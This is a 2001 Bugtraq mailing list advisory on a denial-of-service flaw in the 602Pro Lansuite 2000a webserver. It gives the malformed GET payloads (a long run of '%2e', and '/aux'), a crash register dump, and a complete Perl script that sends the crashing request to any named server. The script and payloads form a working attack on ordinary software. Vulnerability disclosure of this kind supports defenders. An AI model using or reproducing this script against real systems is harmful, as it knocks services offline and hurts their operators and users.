Bugtraq mailing list archives
602Pro Lansuite Denial Of Service 1.0.34
From: nitr0s () HOTMAIL COM
Date: Mon, 26 Mar 2001 11:58:27 -0000
Advisory Name:Lansuite Webserver Denial of Service Discovered:8th and 23rd Of March 2001 Application:602Pro Lansuite 2000a 1.0.34 - prior versions and possibly 1.0.35 Platform:Windows 2k,95/98/NT - others unknown Severity:Denial of service from application Credit:Liamer () eircom net Vendor Status:Unknown - http://www.602software.com/ Description: There are 2 problems, the first is a buffer overflow in WEBPROX.DLL and the other in relation to MS-DOS device files.Credit should be given to Gründl <peter.grundl () defcom com> who made me think of trying this same problem that he found in Alt-N Technologies MDaemon WebConfiguration feature which also affects Xitami Webserver 2.4b5 and probably a whole load of other windows server programs. Demonstration: Connect to the webserver and send the following request: GET /%2e%2e%2e%2e.... /HTTP/1.0 Where %2e is over 157 times The server depending on how many times %2e or [.] is sent will exit displaying the following error: LANSUITE caused an invalid page fault in module WEBPROX.DLL at 015f:008a1326. Registers: EAX=0000000a CS=015f EIP=008a1326 EFLGS=00010216 EBX=00000008 SS=0167 ESP=05202848 EBP=05202848 ECX=0000000a DS=0167 ESI=81648e38 FS=2c37 EDX=334f2b1f ES=0167 EDI=81623ff0 GS=0000 Bytes at CS:EIP: 8b 48 2c 83 e1 01 85 c9 74 2d 8b 55 08 c7 42 18 Stack dump: 052029dc 00862e9a 0000000a 334f2b1f 000000fa 81623ff0 81648e38 00000008 bff7b317 018d0000 00000000 018d1650 018d1650 0520ace7 018d164c 052028cc The other problem is requesting MS-DOS device files, send the following request to the webserver on port 80 GET /aux --------------------------------------------------------------- #!/usr/bin/perl # # 602Pro Lansuite 2000a 1.0.34 Denial Of Service # # # Malformed GET request # use Getopt::Std; use Socket; getopts('s:', \%args); if(!defined($args{s})){&usage;} my ($serv,$port,$foo,$number,$data,$buf,$in_addr,$padd r,$proto); $foo = "%2e"; $number = "160"; $data .= $foo x $number; $serv = $args{s}; $port = 80; $buf = "GET /$data /HTTP/1.0\r\n\r\n"; $in_addr = (gethostbyname($serv))[4] || die("Error: $! \n"); $paddr = sockaddr_in($port, $in_addr) || die ("Error: $! \n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(S, PF_INET, SOCK_STREAM, $proto) || die ("Error: $!"); connect(S, $paddr) ||die ("Error: $!"); select(S); $| = 1; select(STDOUT); print S "$buf"; print("Data has been successfully sent to $serv\n"); sub usage {die("\n\n$0 -s <server>\n\n");}
Current thread:
- 602Pro Lansuite Denial Of Service 1.0.34 nitr0s (Mar 26)